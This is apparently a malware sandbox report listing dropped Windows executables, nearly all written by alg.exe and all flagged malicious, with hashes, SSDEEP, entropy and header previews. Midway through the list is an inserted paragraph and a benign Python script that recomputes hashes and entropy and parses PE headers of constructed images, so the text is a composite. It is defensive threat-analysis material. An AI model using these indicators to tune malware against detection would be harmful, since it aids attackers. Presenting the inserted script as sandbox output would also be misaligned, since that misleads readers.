                                                                                                                                                                                                                                                                                                                                                    SHA-512:5A13996F1FA342339D20F08164B01D4E31BCB5DE225C004BD543E05E45B855509362C72DF4E1F52E6D9EDFEE896DBCD3A1C6634E0756FE972D86C30CA4987676
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.356071962397307
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:vXr/SVMxWtsqjnhMgeiCl7G0nehbGZpbD:T1xkDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:264ECA7E0505D33A7F470E7E398C410F
                                                                                                                                                                                                                                                                                                                                                    SHA1:F9B6AC7300ED37D386B64C71D8F48051432A525E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7478E57859F718D1790164B01AAAAA2BF11575B07D890067BC7A7E8CE2C6EFCF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:AC26CA008E8122F00CE52AF3AE8BD19208AC06A7B9D06556560554FF8173EEC465FFB8AAF25DC28F631B3B10CEC4B6C17A2525CA9F4C6FF577A1C641B2C6D207
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P................... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.248638103242584
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:196608:NhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOnVQBWG:NhRCpGpMJMrbp8JjpNdNlc5RB
                                                                                                                                                                                                                                                                                                                                                    MD5:6434CFCBEEE1A5112CB3AE797D6E337E
                                                                                                                                                                                                                                                                                                                                                    SHA1:1CDFAA0306E944C54211321D0D7DBED3BBDA4AD6
                                                                                                                                                                                                                                                                                                                                                    SHA-256:1CB8E20A25AF9979A316CF873BE5CA82162B42EC6D12A4C7C08D918F0423B463
                                                                                                                                                                                                                                                                                                                                                    SHA-512:7DBFB6A970E263AA3536CCEEBC1A2E7C1BE0634DD3592B3D802175C09C645530FDCAF9C4365F657DB0CA02481B9733A19C611AE200274693E3445D62AA6C7174
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.789026310302194
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:083pZ3kd0CuEeN0LUmRXzYs65mfDmg27RnWGj:4KuUQY15wD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:29C1C2EE52F68BC4214D00D747B415D2
                                                                                                                                                                                                                                                                                                                                                    SHA1:49EFEE595B2E4FB30EBF52269E12CBBF56D212D0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:493FAAABCE17C754AF5CBD1E8E54F1628522183708740B52B7D8D59385D518A3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:1AE9B680057388EDED732ACA6CE3CD67356680CCF68D4A314E4F8A45EA5460BDA0BD68F414C74DD4F4B4AA74D44314493B112F5D7A375BE5E566ABBFD69FE28A
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......`"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.670847648427698
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:yErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MO:MA4oGlcR+glEdOPKzgVZxD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:101EE4D517BB29BCACDA5376C6B145A8
                                                                                                                                                                                                                                                                                                                                                    SHA1:B0290DD5CA4382E15A834647B91444C8005C4761
                                                                                                                                                                                                                                                                                                                                                    SHA-256:1393A22E6E04E6CAD19FFAF66C8AACFD68E59F7F7AFB2414AF959A4784FBEF90
                                                                                                                                                                                                                                                                                                                                                    SHA-512:810B44CCAF6C8B1CCD4374C456066EC57C7149C9AAB093D203D899867FA4C60D89BB254773E657F462803CE733265963D29E0D43D48549AC7D584B5181C413FA
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.....=.K... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4897792
Entropy (8bit):6.8297694974406715
Encrypted:false
SSDEEP:49152:q8ErLqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKN:Lv2gM+qwXLg7pPgw/DSZlND527BWG
MD5:83A1C817E9E72D689EE419B756109AFE
SHA1:8E521FA33BDE5BD5BBA113A62CE19BBE1F4EB9C4
SHA-256:785E1AD72935B7C38C6D95249187A43D246D999F4D3E2D0AAADC58A20CEB1FF2
SHA-512:215551BEAF884F8B2AC0DEE0802EC4E2DB3C0B35F3A74618A1E17EEB936C916BDC152FBDAC3C2DF81AD1AFA11FD6D2D03D5AB0D4C6F61C2B51D4C1248DE1F08E
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4897792
Entropy (8bit):6.829770149517045
Encrypted:false
SSDEEP:49152:v8ErLqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKN:4v2gM+qwXLg7pPgw/DSZlND527BWG
MD5:F6832237BB9E675131F9842F925276FC
SHA1:CFACA5325AA3623F37C78537B9240C64BF9D68D7
SHA-256:72E962CBFF4F3EBE93F60B7FBA0830CCEC7D43F7802979F44922D52D7555560D
SHA-512:7BC412AC1EE21F0AEE236C3DCD579B787F5D7598F2BEFB2BE7584D51D4A85048D44D8741E024FB95E9A6B00C5D36F90AD5CA53CDF22955FE579B53BE6A5EEE2C
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......D/......... ..........@..............................L......dK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2156544
Entropy (8bit):6.9535858053824064
Encrypted:false
SSDEEP:24576:wtjqL8fH+8aUbp8D/8+xJWAlsqjnhMgeiCl7G0nehbGZpbD:8jKK+81FI/8o3Dmg27RnWGj
MD5:264EC33CC1953C752E99AB060E79C157
SHA1:EDA03394A4102FD2939414F200BEC28B21A7CAD2
SHA-256:AFBE83B3A212A34D22903A275A3D38ACF841BCD521D0879E68B0F18194B0195C
SHA-512:76777B5DF63363D9472C623457FA7BC205D0745F5A4EE38CA1D5BCAEDB88D1A37632D7FF2293E58D68BF40A8F20BFC7200DC413C6BD9BE59CAC63A11303A1F68
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......F.....................@.............................P".....(.!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2370560
Entropy (8bit):7.03239066918582
Encrypted:false
SSDEEP:49152:eAMsOu3JfCIGnZuTodRFYKBrFIbWp9Dmg27RnWGj:eAMa38ZuTS3D527BWG
MD5:FDA90B2C857B9C8712D77E15CA3845EA
SHA1:75EBE8E9194A12BE88C5BA61D8C00D3DEE60F0D0
SHA-256:8BFFA9D6913C417361B30B2880B9210376A3D575FB580D33DFEDB86FA00DDF5A
SHA-512:33ED32DF45FCEF32EFFF2CC5EFC194DA38FC09B0045BE49978F8E1728A33D6AEDF7488DD6718FE1028738DECA2ED38A49093AE264D71ED10FF3BEF1D092D5D1A
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1984512
Entropy (8bit):7.104346106804214
Encrypted:false
SSDEEP:24576:dwbK7tnhD4aH6wD2Krx5NgOOagWE84IsqjnhMgeiCl7G0nehbGZpbD:dSK7Fhslq2EPfOQEYDmg27RnWGj
MD5:E07F024AD50EF77B6AB1CD69A214BE86
SHA1:5489924C0026BAF1EDEB737AA8F556809B7CCB1E
SHA-256:E73C79298AA5535284C66C2FA2CD2DF5D62A1A179CCE027EBA3462CE8E5B9034
SHA-512:90006751320F702BA87E7DECC46D9B35AAC4375956BA1A2D65451FBC7A55690F8E7885F5F0AE5B6553221F14C901EDE8AB80AC277DD933BBC3D19A6EDCA4707D
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
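Every record above is derived from the dropped file's bytes alone: the file type comes from the PE headers, the size and 8-bit Shannon entropy from the whole file, the four digests from the same bytes, and the Preview column is the leading bytes with everything non-printable rendered as ".", which is why the DOS stub text, the "PE" signature and the section names (.text, .rdata, .data, .pdata, .rsrc, .reloc and, in the larger drops, .00cfg, .gxfg, .retplne, .tls, CPADinfo, LZMADEC, _RDATA, malloc_h) are legible in it. The script below recomputes those columns and parses the header that the preview shows. It is an added example for this report, not Joe Sandbox code: the PE images it processes are constructed inline (valid PE32+ header layout, no executable code), no real dropped file is read, and SSDEEP is left out because it needs a third-party library. Run against two constructed images that differ by one trailing byte, it reproduces the property the two 4897792-byte records above exhibit: every digest changes while the size class, section layout and entropy stay essentially the same, which is why the SSDEEP and section columns, not the hashes, are what to compare across drops.

```python
"""Recompute the per-file columns of a sandbox 'Dropped Files' record (file type,
size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512, printable preview) and parse the
PE header that the preview shows. Added example for this report, not Joe Sandbox
code; the PE images are constructed in-line so the script runs offline."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_I386 = 0x014C
PE32PLUS_MAGIC = 0x020B
DOS_STUB = b"This program cannot be run in DOS mode.\r\r\n$"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in [0, 8]; this is the 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def printable_preview(data: bytes, length: int = 128) -> str:
    """Leading bytes with non-printables shown as '.', like the 'Preview' column."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                   # COFF file header is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]    # 0x10B = PE32, 0x20B = PE32+
    subsystem = struct.unpack_from("<H", data, opt + 68)[0] if opt_size >= 70 else 0
    sections = []
    for i in range(nsections):
        off = opt + opt_size + i * 40                 # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": name, "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr})
    return {"machine": machine, "pe32plus": magic == PE32PLUS_MAGIC,
            "subsystem": subsystem, "sections": sections}


def describe(data: bytes) -> dict:
    """One record with the same columns as the sandbox table (SSDEEP omitted)."""
    pe = parse_pe(data)
    arch = {IMAGE_FILE_MACHINE_AMD64: "x86-64",
            IMAGE_FILE_MACHINE_I386: "Intel 80386"}.get(pe["machine"], hex(pe["machine"]))
    sub = {2: "GUI", 3: "console"}.get(pe["subsystem"], f"subsystem {pe['subsystem']}")
    return {
        "File Type": f"PE32{'+' if pe['pe32plus'] else ''} executable ({sub}) {arch}, for MS Windows",
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
        "Sections": [s["name"] for s in pe["sections"]],
        "Preview": printable_preview(data),
    }


def build_pe64(section_names, body: bytes = b"") -> bytes:
    """Constructed minimal PE32+ GUI image with a real header layout. Test data only."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    dos[0x4E:0x4E + len(DOS_STUB)] = DOS_STUB
    struct.pack_into("<I", dos, 0x3C, 0x80)           # e_lfanew -> PE signature
    opt_size = 0xF0                                   # size of a PE32+ optional header
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, len(section_names),
                       0, 0, 0, opt_size, 0x0022)     # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<H", opt, 68, 2)                # IMAGE_SUBSYSTEM_WINDOWS_GUI
    headers_len = len(dos) + 4 + len(coff) + opt_size + 40 * len(section_names)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                    len(body) if i == 0 else 0, headers_len if i == 0 else 0,
                    0, 0, 0, 0, 0x60000020)           # CNT_CODE | MEM_EXECUTE | MEM_READ
        for i, n in enumerate(section_names))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + body


if __name__ == "__main__":
    names = [".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc"]
    a = build_pe64(names, body=bytes(range(256)) * 4)
    b = build_pe64(names, body=bytes(range(256)) * 4 + b"\x90")  # one trailing byte differs
    for rec in (describe(a), describe(b)):
        print("\n".join(f"{k}:{v}" for k, v in rec.items()), end="\n\n")
```

To apply it to a real dropped file, replace the constructed images with `open(path, "rb").read()`; `describe()` then yields the same columns as the table, and `parse_pe()` gives the full section table that the Preview column only shows truncated.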
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1779712
Entropy (8bit):7.158070032573331
Encrypted:false
SSDEEP:24576:cKI7Twj5KDHxJ1FxyD+/wsG1pbbxYsqjnhMgeiCl7G0nehbGZpbD:cv7e0j31mD+/wDxbWDmg27RnWGj
MD5:F4F3185A039E7BEECCD93095292F567F
SHA1:4D6AF4F2B162EEE237B1B373953C84EFC8F15CA1
SHA-256:72E8AB42F2EA4411D095E7C5831B8D1FDED6E0582E2EDEFB3F0F2B43EAFF8D38
SHA-512:7A4C90317B868844B8D9691DC80C6DE55B4AC3C72145FA0137F41048E7979D0158574DBFBF6E73B06F86284EEA7F9B7DA7C19931A8926B922E9457FA3CCC9415
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1378304
Entropy (8bit):5.377440413175293
Encrypted:false
SSDEEP:12288:SQUVPDHhSrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:FyhSrsqjnhMgeiCl7G0nehbGZpbD
MD5:D597EFE7E48A8C541950161C0F583D2C
SHA1:E915AA8008113A009FA7C8316827872D3BE16345
SHA-256:7A6EAFCCE92F0FA06DEBE1D6E322FBE6C1EDB81302FFABFDF30029E8211566CA
SHA-512:8CE5BCC4373C77D03940D9857AD1D26F032E37E5FC4EDB92051FA9EB66200066FAC64DCA2B963B6A9F033A156946CA6B407053FF6F52844C46BE11BD4E2528D9
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......&..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1286656
Entropy (8bit):7.222123140527126
Encrypted:false
SSDEEP:24576:ssFfc1VyFn5UQn652bO4HQsqjnhMgeiCl7G0nehbGZpbD:ssFcIn5rJWDmg27RnWGj
MD5:022ADB97751A43B5B79EA67E3A1BA9AC
SHA1:A51C11BE8FD83896C190CADDBA377347C7293043
SHA-256:B5549EEAF9E0598F19E6554F98B1A039E09D27C435B17FE590FA6374CF8E1085
SHA-512:0A284006C0299CC6D9B76F47F0F8544655BA43B1AC5574CE85EC44C582341557345D9A9D6EA1A3A336E1327CEFD596C26C8FAA12AB2C903429BED97D794542AB
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................I..... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1246208
Entropy (8bit):7.494290926708551
Encrypted:false
SSDEEP:24576:Bt9o6p4xQbiKI69wpemIwpel93sqjnhMgeiCl7G0nehbGZpbD:Bt9faQbtl2peapel1Dmg27RnWGj
MD5:6F78CF3A7A73C53BCF1590D0CCDBAB25
SHA1:F3935C82AB9E30B8A73E4316211906ED59D47096
SHA-256:26B390AA741DFD8930B65AC50AE715B0DF8353FE62028F9D102D7C67F259B586
SHA-512:00FC4A2C0DD957148986F2F4339EEB3FFCE2301C451A35BA4E97BBDEDACE7A3AFD2E53B7A786E70D1F5B3B48110FAA0E932D7E462B3EC4D06B6E73863A100337
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1356800
Entropy (8bit):5.347843811104141
Encrypted:false
SSDEEP:24576:+QVTZu0J4sqjnhMgeiCl7G0nehbGZpbD:lVTZulDmg27RnWGj
MD5:169D0903363BAAB2EA1A36F40FCB0E62
SHA1:B226FBC2AF772335ABA997FC568B5BA037B745DD
SHA-256:AB00F1F64A87384DC53C3A9B4795F1D8E55C96D2C1DB5BE002E521E9A8BE17F2
SHA-512:418A9F7A15FFAECD67DEBE702F5C5C7D9BC1B3DCD036976E25E2D3B8744761A80C8973EAC9A8A0FBD1618960D7ABBC94C795A85B3F8D8BCFF325731DC297DB06
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1344000
Entropy (8bit):6.808417125045837
Encrypted:false
SSDEEP:24576:TC1vpgXcZHzCsqjnhMgeiCl7G0nehbGZpbD:TC1vpIcNGDmg27RnWGj
MD5:2CA9ABE494F35B561E7ED4888CF62B31
SHA1:ADF872ED6F2DE3D47DA6FB69DC0642FDEDA9839A
SHA-256:8BCBD160EF8730021B0A94B93AFB62403C7BA8D8EBEBC5F0C9B14C69E544D441
SHA-512:C6963C7F806A292C8034E8006F5F7FFEAA0C9A2B2B383CE16341E00DDCC4EE71DC807A12F97E641053FB17DDE85D6981E070B11A99F83AD1E57F237713CF6209
Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................Zb.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.140029777988957
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:qSwj+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qv+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:F91117F64FDEABA0DF5FF57AD138946B
                                                                                                                                                                                                                                                                                                                                                    SHA1:3499D360AB159FEECB418428DA5F4DCD0DAE34EB
                                                                                                                                                                                                                                                                                                                                                    SHA-256:1FE442A2343EB4A0179AC62661EEFF1FC36898995FD131BB72081C348E42E969
